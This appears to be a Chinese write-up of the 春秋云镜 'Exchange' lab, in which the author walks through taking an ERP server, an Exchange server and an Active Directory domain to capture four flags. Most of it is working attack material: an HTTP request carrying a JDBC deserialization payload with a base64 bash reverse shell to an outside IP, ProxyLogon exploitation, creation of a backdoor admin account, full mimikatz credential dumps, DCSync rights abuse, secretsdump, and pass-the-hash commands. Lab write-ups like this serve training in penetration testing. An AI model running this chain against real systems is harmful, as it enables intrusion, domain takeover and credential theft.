春秋云镜-Exchange

渗透

春秋云镜-Exchange

flag01

fscan扫一下

fscan -h 39.98.120.143

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.98.120.143:22 open
39.98.120.143:8000 open
39.98.120.143:80 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.98.120.143      code:200 len:19813  title:lumia
[*] WebTitle http://39.98.120.143:8000 code:302 len:0      title:None 跳转url: http://39.98.120.143:8000/login.html
[*] WebTitle http://39.98.120.143:8000/login.html code:200 len:5662   title:Lumia ERP

8000端口有个华夏 ERP的cms。可以利用/user/getAllList;.ico这个未授权接口获取密码的哈希，或者直接弱口令admin/123456进入后台

Java 代码审计之华夏 ERP CMS v2.3 - FreeBuf网络安全行业门户

然后fastjson打jdbc反序列化拿shell

一开始用的evil-mysql-server，能执行命令，但是一直弹不到shell

1	./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial.jar

后面改用MySQL_Fake_Server，但是这个好像要python3.8以下才能用，还好有师傅已经解决了这个问题@coroutine has deprecated since python3.8

这是我的配置文件

http请求包

GET /depotHead/list?search={{url({
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.jdbc.JDBC4Connection",
    "hostToConnectTo": "156.238.233.55",
    "portToConnectTo": 3307,
    "info": {
        "user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTYuMjM4LjIzMy41NS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}", 
        "password": "pass", 
        "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", 
        "autoDeserialize": "true", 
        "NUM_HOSTS": "1" 
    } 
})}}&currentPage=1&pageSize=15 HTTP/1.1
Host: 39.98.108.119:8000
Cookie: JSESSIONID=3CE4BA50A38543F5F71B0562AE03D21C

flag01: flag{8aaa35a9-9f53-417e-868f-1c53bc9aea9d}

flag02

搭代理，扫内网

./fscan -h 172.22.3.12/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.3.12     is alive
(icmp) Target 172.22.3.2      is alive
(icmp) Target 172.22.3.9      is alive
(icmp) Target 172.22.3.26     is alive
[*] Icmp alive hosts len is: 4
172.22.3.26:445 open
172.22.3.9:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.26:139 open
172.22.3.9:139 open
172.22.3.2:139 open
172.22.3.26:135 open
172.22.3.9:135 open
172.22.3.2:135 open
172.22.3.9:808 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.2:88 open
172.22.3.12:8000 open
172.22.3.9:8172 open
[*] alive ports len is: 18
start vulscan
[*] WebTitle http://172.22.3.12        code:200 len:19813  title:lumia
[*] NetInfo 
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] NetInfo 
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[*] NetInfo 
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] NetBios 172.22.3.26     XIAORANG\XIAORANG-PC          
[*] OsInfo 172.22.3.2   (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.3.2      [+] DC:XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.3.12:8000   code:302 len:0      title:None 跳转url: http://172.22.3.12:8000/login.html
[*] WebTitle http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP
[*] WebTitle http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle https://172.22.3.9:8172   code:404 len:0      title:None
[*] WebTitle http://172.22.3.9         code:403 len:0      title:None
[*] WebTitle https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook
已完成 18/18
[*] 扫描结束,耗时: 10.903642768s

看看有什么靶机

172.22.3.2 DC

172.22.3.9 XIAORANG-EXC01.xiaorang.lab （邮件服务器

172.22.3.12 外网(已拿下)

172.22.3.26 XIAORANG\XIAORANG-PC

172.22.3.9是个exchange，我们直接用Proxylogin进行攻击 FDlucifer/Proxy-Attackchain

1	proxychains python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab

拿到system权限。

加一个账号进去

1 2	net user fffffilm Password@973 /add net localgroup administrators fffffilm /add

远程rdp进去拿flag

flag02: flag{e27b65a6-f2fa-4c39-bc62-a3a606b28c1b}

flag04

上mimikazt抓一下哈希

C:\Users\fffffilm\Desktop>mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" exit

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonPasswords

Authentication Id : 0 ; 2253980 (00000000:0022649c)
Session           : RemoteInteractive from 2
User Name         : Zhangtong
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/1 20:16:35
SID               : S-1-5-21-533686307-2117412543-4200729784-1147
        msv :
         [00000003] Primary
         * Username : Zhangtong
         * Domain   : XIAORANG
         * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
         * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
         * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
        tspkg :
        wdigest :
         * Username : Zhangtong
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : Zhangtong
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/1 20:14:52
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 111502 (00000000:0001b38e)
Session           : Service from 0
User Name         : Zhangtong
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/1 20:14:52
SID               : S-1-5-21-533686307-2117412543-4200729784-1147
        msv :
         [00000003] Primary
         * Username : Zhangtong
         * Domain   : XIAORANG
         * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
         * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
         * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
        tspkg :
        wdigest :
         * Username : Zhangtong
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : Zhangtong
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 23829 (00000000:00005d15)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/3/1 20:14:34
SID               :
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 535602bb7f4523e2979148feee2cc749
         * SHA1     : b39f4a0ec7de08a72d6e5dfcee3d844967136734
        tspkg :
        wdigest :
        kerberos :
        ssp :
         [00000000]
         * Username : HealthMailbox0d5918ea7298475bbbb7e3602e1e289d@xiaorang.lab
         * Domain   : (null)
         * Password : PyxY&2QQ)4rAM&3oiqdNxQ)3?3dR^oDMxtVr*zoHc}*x$MLtHk&O1^Gxm%wc{Sd=SZB|vH+$Kl{;]cIQLoEz/Y=?0qBWm2gj(i]Y5D-pk7N*h80Qh7x^}rwgD%!8PteC
         [00000001]
         * Username : HealthMailbox0d5918ea7298475bbbb7e3602e1e289d@xiaorang.lab
         * Domain   : (null)
         * Password : PyxY&2QQ)4rAM&3oiqdNxQ)3?3dR^oDMxtVr*zoHc}*x$MLtHk&O1^Gxm%wc{Sd=SZB|vH+$Kl{;]cIQLoEz/Y=?0qBWm2gj(i]Y5D-pk7N*h80Qh7x^}rwgD%!8PteC
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XIAORANG-EXC01$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/1 20:14:34
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xiaorang-exc01$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 4334211 (00000000:00422283)
Session           : RemoteInteractive from 3
User Name         : fffffilm
Domain            : XIAORANG-EXC01
Logon Server      : XIAORANG-EXC01
Logon Time        : 2025/3/1 20:22:54
SID               : S-1-5-21-804691931-3750513266-524628342-1000
        msv :
         [00000003] Primary
         * Username : fffffilm
         * Domain   : XIAORANG-EXC01
         * NTLM     : ad123012e39b20a80ebe424bff56e1b4
         * SHA1     : 86bc9e9af57b6884802421251699bf41a1fc152a
        tspkg :
        wdigest :
         * Username : fffffilm
         * Domain   : XIAORANG-EXC01
         * Password : (null)
        kerberos :
         * Username : fffffilm
         * Domain   : XIAORANG-EXC01
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 2451634 (00000000:002568b2)
Session           : NetworkCleartext from 0
User Name         : HealthMailbox0d5918e
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/1 20:16:42
SID               : S-1-5-21-533686307-2117412543-4200729784-1136
        msv :
         [00000003] Primary
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * NTLM     : 437d8b20905f1cdf1d7bff8e8fe671ae
         * SHA1     : 4493de617d0b29882718a4cab1662f243ca1fc44
         * DPAPI    : 6006f95be384bd230f627f6f5a2786a8
        tspkg :
        wdigest :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 2052850 (00000000:001f52f2)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/1 20:16:28
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 535602bb7f4523e2979148feee2cc749
         * SHA1     : b39f4a0ec7de08a72d6e5dfcee3d844967136734
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 68 72 cd d9 0e c4 5f 76 60 a8 a7 50 78 70 b0 9b be e1 93 10 98 c3 77 38 87 a2 f2 00 87 6a 23 b5 a1 73 cf d0 a7 ed d1 f0 b4 f6 83 8a 9f 14 0c f7 7e db 71 01 fd 6f 8e 90 3e db 8e 66 f0 c0 d1 bd 5c 1b fd 3d 5c f1 a1 cd 17 e4 86 51 b2 13 e1 99 2d 2b 74 b7 d7 02 8a 25 e2 94 ee 01 97 39 23 97 aa 00 82 37 f6 5f 61 4c 22 a5 f6 25 da 12 fb 87 4c 87 c5 0e 94 97 bb d7 1f d4 4c a9 9b 66 bc b7 e2 16 02 90 15 cf 08 90 cc 3c 8d dc e2 9d 76 43 0c 45 c0 11 f6 7e 34 c0 0d f2 23 c1 0d c2 d9 0b 7b 59 a8 aa cf 86 db cf 51 aa 0e 4c 29 a0 e5 aa d4 78 56 14 9a 56 81 bc 03 f7 5b d8 32 ac 5d 11 67 fa b8 a6 9f 4d 08 52 dc 5a be 2e 8a 4c 6a 8b 30 80 de b3 53 14 5c 3c 8a 55 2a f4 6f 45 ef b6 5b eb 55 36 7c 19 82 a5 f5 ff 30 95 07 3a ce 7f
        ssp :
        credman :

Authentication Id : 0 ; 65269 (00000000:0000fef5)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/1 20:14:50
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 535602bb7f4523e2979148feee2cc749
         * SHA1     : b39f4a0ec7de08a72d6e5dfcee3d844967136734
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 68 72 cd d9 0e c4 5f 76 60 a8 a7 50 78 70 b0 9b be e1 93 10 98 c3 77 38 87 a2 f2 00 87 6a 23 b5 a1 73 cf d0 a7 ed d1 f0 b4 f6 83 8a 9f 14 0c f7 7e db 71 01 fd 6f 8e 90 3e db 8e 66 f0 c0 d1 bd 5c 1b fd 3d 5c f1 a1 cd 17 e4 86 51 b2 13 e1 99 2d 2b 74 b7 d7 02 8a 25 e2 94 ee 01 97 39 23 97 aa 00 82 37 f6 5f 61 4c 22 a5 f6 25 da 12 fb 87 4c 87 c5 0e 94 97 bb d7 1f d4 4c a9 9b 66 bc b7 e2 16 02 90 15 cf 08 90 cc 3c 8d dc e2 9d 76 43 0c 45 c0 11 f6 7e 34 c0 0d f2 23 c1 0d c2 d9 0b 7b 59 a8 aa cf 86 db cf 51 aa 0e 4c 29 a0 e5 aa d4 78 56 14 9a 56 81 bc 03 f7 5b d8 32 ac 5d 11 67 fa b8 a6 9f 4d 08 52 dc 5a be 2e 8a 4c 6a 8b 30 80 de b3 53 14 5c 3c 8a 55 2a f4 6f 45 ef b6 5b eb 55 36 7c 19 82 a5 f5 ff 30 95 07 3a ce 7f
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XIAORANG-EXC01$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/1 20:14:50
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 535602bb7f4523e2979148feee2cc749
         * SHA1     : b39f4a0ec7de08a72d6e5dfcee3d844967136734
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xiaorang-exc01$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 4334240 (00000000:004222a0)
Session           : RemoteInteractive from 3
User Name         : fffffilm
Domain            : XIAORANG-EXC01
Logon Server      : XIAORANG-EXC01
Logon Time        : 2025/3/1 20:22:54
SID               : S-1-5-21-804691931-3750513266-524628342-1000
        msv :
         [00000003] Primary
         * Username : fffffilm
         * Domain   : XIAORANG-EXC01
         * NTLM     : ad123012e39b20a80ebe424bff56e1b4
         * SHA1     : 86bc9e9af57b6884802421251699bf41a1fc152a
        tspkg :
        wdigest :
         * Username : fffffilm
         * Domain   : XIAORANG-EXC01
         * Password : (null)
        kerberos :
         * Username : fffffilm
         * Domain   : XIAORANG-EXC01
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 4326956 (00000000:0042062c)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/1 20:22:54
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 535602bb7f4523e2979148feee2cc749
         * SHA1     : b39f4a0ec7de08a72d6e5dfcee3d844967136734
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 68 72 cd d9 0e c4 5f 76 60 a8 a7 50 78 70 b0 9b be e1 93 10 98 c3 77 38 87 a2 f2 00 87 6a 23 b5 a1 73 cf d0 a7 ed d1 f0 b4 f6 83 8a 9f 14 0c f7 7e db 71 01 fd 6f 8e 90 3e db 8e 66 f0 c0 d1 bd 5c 1b fd 3d 5c f1 a1 cd 17 e4 86 51 b2 13 e1 99 2d 2b 74 b7 d7 02 8a 25 e2 94 ee 01 97 39 23 97 aa 00 82 37 f6 5f 61 4c 22 a5 f6 25 da 12 fb 87 4c 87 c5 0e 94 97 bb d7 1f d4 4c a9 9b 66 bc b7 e2 16 02 90 15 cf 08 90 cc 3c 8d dc e2 9d 76 43 0c 45 c0 11 f6 7e 34 c0 0d f2 23 c1 0d c2 d9 0b 7b 59 a8 aa cf 86 db cf 51 aa 0e 4c 29 a0 e5 aa d4 78 56 14 9a 56 81 bc 03 f7 5b d8 32 ac 5d 11 67 fa b8 a6 9f 4d 08 52 dc 5a be 2e 8a 4c 6a 8b 30 80 de b3 53 14 5c 3c 8a 55 2a f4 6f 45 ef b6 5b eb 55 36 7c 19 82 a5 f5 ff 30 95 07 3a ce 7f
        ssp :
        credman :

Authentication Id : 0 ; 4326940 (00000000:0042061c)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/1 20:22:54
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 535602bb7f4523e2979148feee2cc749
         * SHA1     : b39f4a0ec7de08a72d6e5dfcee3d844967136734
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 68 72 cd d9 0e c4 5f 76 60 a8 a7 50 78 70 b0 9b be e1 93 10 98 c3 77 38 87 a2 f2 00 87 6a 23 b5 a1 73 cf d0 a7 ed d1 f0 b4 f6 83 8a 9f 14 0c f7 7e db 71 01 fd 6f 8e 90 3e db 8e 66 f0 c0 d1 bd 5c 1b fd 3d 5c f1 a1 cd 17 e4 86 51 b2 13 e1 99 2d 2b 74 b7 d7 02 8a 25 e2 94 ee 01 97 39 23 97 aa 00 82 37 f6 5f 61 4c 22 a5 f6 25 da 12 fb 87 4c 87 c5 0e 94 97 bb d7 1f d4 4c a9 9b 66 bc b7 e2 16 02 90 15 cf 08 90 cc 3c 8d dc e2 9d 76 43 0c 45 c0 11 f6 7e 34 c0 0d f2 23 c1 0d c2 d9 0b 7b 59 a8 aa cf 86 db cf 51 aa 0e 4c 29 a0 e5 aa d4 78 56 14 9a 56 81 bc 03 f7 5b d8 32 ac 5d 11 67 fa b8 a6 9f 4d 08 52 dc 5a be 2e 8a 4c 6a 8b 30 80 de b3 53 14 5c 3c 8a 55 2a f4 6f 45 ef b6 5b eb 55 36 7c 19 82 a5 f5 ff 30 95 07 3a ce 7f
        ssp :
        credman :

Authentication Id : 0 ; 2051627 (00000000:001f4e2b)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/1 20:16:28
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 535602bb7f4523e2979148feee2cc749
         * SHA1     : b39f4a0ec7de08a72d6e5dfcee3d844967136734
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 68 72 cd d9 0e c4 5f 76 60 a8 a7 50 78 70 b0 9b be e1 93 10 98 c3 77 38 87 a2 f2 00 87 6a 23 b5 a1 73 cf d0 a7 ed d1 f0 b4 f6 83 8a 9f 14 0c f7 7e db 71 01 fd 6f 8e 90 3e db 8e 66 f0 c0 d1 bd 5c 1b fd 3d 5c f1 a1 cd 17 e4 86 51 b2 13 e1 99 2d 2b 74 b7 d7 02 8a 25 e2 94 ee 01 97 39 23 97 aa 00 82 37 f6 5f 61 4c 22 a5 f6 25 da 12 fb 87 4c 87 c5 0e 94 97 bb d7 1f d4 4c a9 9b 66 bc b7 e2 16 02 90 15 cf 08 90 cc 3c 8d dc e2 9d 76 43 0c 45 c0 11 f6 7e 34 c0 0d f2 23 c1 0d c2 d9 0b 7b 59 a8 aa cf 86 db cf 51 aa 0e 4c 29 a0 e5 aa d4 78 56 14 9a 56 81 bc 03 f7 5b d8 32 ac 5d 11 67 fa b8 a6 9f 4d 08 52 dc 5a be 2e 8a 4c 6a 8b 30 80 de b3 53 14 5c 3c 8a 55 2a f4 6f 45 ef b6 5b eb 55 36 7c 19 82 a5 f5 ff 30 95 07 3a ce 7f
        ssp :
        credman :

Authentication Id : 0 ; 1946225 (00000000:001db271)
Session           : NetworkCleartext from 0
User Name         : HealthMailbox0d5918e
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/1 20:16:24
SID               : S-1-5-21-533686307-2117412543-4200729784-1136
        msv :
         [00000003] Primary
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * NTLM     : 437d8b20905f1cdf1d7bff8e8fe671ae
         * SHA1     : 4493de617d0b29882718a4cab1662f243ca1fc44
         * DPAPI    : 6006f95be384bd230f627f6f5a2786a8
        tspkg :
        wdigest :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 111353 (00000000:0001b2f9)
Session           : Service from 0
User Name         : Zhangtong
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/1 20:14:52
SID               : S-1-5-21-533686307-2117412543-4200729784-1147
        msv :
         [00000003] Primary
         * Username : Zhangtong
         * Domain   : XIAORANG
         * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
         * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
         * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
        tspkg :
        wdigest :
         * Username : Zhangtong
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : Zhangtong
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/1 20:14:50
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 65301 (00000000:0000ff15)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/1 20:14:50
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * NTLM     : 9587463cfa3fd1ea760c401e2c52e224
         * SHA1     : 162fc915ffccfa73c6f53b3c92f02690ccf7831c
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 12 ae e6 f2 22 80 c0 a3 cd 84 c9 94 de ef 96 52 79 ff ea 99 f6 9c 67 48 10 08 e7 99 1a fa 51 11 ad b6 c1 79 cc 6d 04 b2 22 01 47 b0 53 b5 7e ff df 04 21 34 ae 7b ee c9 cf b1 c1 d3 c0 63 d3 d7 6a f2 3a 38 83 ac cf d2 93 7b d3 0b bb d6 a5 8d 7c cd f1 77 65 0b 8c 77 dd 98 49 3c 21 f0 5d fc a7 8f c7 e0 5b f7 96 4d d2 46 14 81 8f 4f a7 a4 27 11 09 03 f9 f4 0d ce 71 4d 8d 64 c3 a9 6b 5c 4a 77 ba ac 33 1a 49 60 11 bd 4d b2 1e 98 05 1a c1 03 5b c6 cf 4e 1c d3 83 10 52 51 68 c4 b1 e0 65 c2 36 f3 a6 3f 66 c6 95 8c 3d 47 ab 9b cb 35 bd 53 f0 6f 13 ae 48 28 5e cf 5b ee 45 ce 7f 10 47 aa e6 f0 d3 09 c0 b3 ad ef 24 00 c5 c8 f0 7f a5 06 93 0e f5 a4 2a ec d0 25 96 4d a4 88 d3 55 94 d9 94 81 ef 8b ba 9e 89 b6 36 dc 88 64 8d 96
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!

里面有两个用户的哈希

* Username : Zhangtong
* Domain   : XIAORANG
* NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b

* Username : XIAORANG-EXC01$
* Domain   : XIAORANG
* NTLM     : 535602bb7f4523e2979148feee2cc749
* SHA1     : b39f4a0ec7de08a72d6e5dfcee3d844967136734

然后bloodhound做一下信息收集

┌──(root㉿kali)-[~/Desktop/tools/BloodHound-python]
└─# proxychains python3 bloodhound.py -u "XIAORANG-EXC01$" --hashes :535602bb7f4523e2979148feee2cc749 -d xiaorang.lab -dc XIAORANG-WIN16.xiaorang.lab -c all --dns-tcp -ns 172.22.3.2 --auth-method ntlm --zip

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: xiaorang.lab
INFO: Connecting to LDAP server: XIAORANG-WIN16.xiaorang.lab
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: XIAORANG-WIN16.xiaorang.lab
INFO: Found 28 users
INFO: Found 73 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 22 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: XIAORANG-PC.xiaorang.lab
INFO: Querying computer: XIAORANG-EXC01.xiaorang.lab
INFO: Querying computer: XIAORANG-WIN16.xiaorang.lab
INFO: Done in 00M 37S
INFO: Compressing output into 20250301203721_bloodhound.zip

发现exchange这台机器有WriteDacl权限，我们直接给自己dsync权限，然后就可以dump到域管哈希了。使用Exchange服务器中的Writedacl实现域提权的提权

proxychains python3 dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :535602bb7f4523e2979148feee2cc749 -action write -rights DCSync -principal XIAORANG-EXC01$ -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2

修改成功

但是尝试的时候发现dump不下来哈希。~~（可能是要重新登录一下~~，后面发现我rdp的是fffffilm用户但是加的是XIAORANG-EXC01$，所以dump不下来

最后还是选择给Zhangtong用户dsync权限拿到哈希。

#加权限
proxychains python3 dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :535602bb7f4523e2979148feee2cc749 -action write -rights DCSync -principal Zhangtong -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2

#拿哈希
proxychains impacket-secretsdump xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm

打PTH

1	proxychains impacket-smbexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.2 -codec gbk

flag04: flag{03c367e2-684f-41d2-9880-4545f0a92d98}

flag03

刚刚导出哈希的时候拿到了Lumia用户的哈希，直接用pthExchange下载所有的邮件。PTH_Exchange

1	proxychains python3 pthexchange.py --target https://172.22.3.9 --username "Lumia" --password "aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296" --action Download

拿到两封邮件，一个有个secret.zip，另一个是一个csv文件，里面有名字和电话号。

这里还说用电话号码加密压缩包，所以提取出电话号码然后爆破zip就行了。

让gpt写个代码

import csv

# 读取 CSV 并提取电话号码
def extract_phone_numbers(csv_file):
    phone_numbers = []
    with open(csv_file, mode='r', encoding='utf-8') as file:
        reader = csv.reader(file)
        for row in reader:
            if len(row) >= 3:  # 确保行内至少有三列
                phone_numbers.append(row[2].strip())  # 提取第三列（索引2）
    return phone_numbers

# 将电话号码写入 pass.txt
def write_phones_to_file(phone_numbers, output_file="pass.txt"):
    with open(output_file, mode='w', encoding='utf-8') as file:
        for phone in phone_numbers:
            file.write(phone + "\n")

# 使用示例
csv_file = "item-1-phone lists.csv"  # 替换为你的文件名
phones = extract_phone_numbers(csv_file)
write_phones_to_file(phones)

print(f"提取的电话号码已保存到 pass.txt 文件中。")

拿到密码18763918468

得到flag

flag03: flag{cf0c753c-233f-4729-8984-0746ea5878b7}

参考文章

Exchange - 春秋云境 | h0ny’s blog

【内网渗透】最保姆级的春秋云镜Exchange打靶笔记-CSDN博客

春秋云镜 Exchange Writeup - Boogiepop Doesn’t Laugh

【WEB】Java JDBC反序列化 | 狼组安全团队公开知识库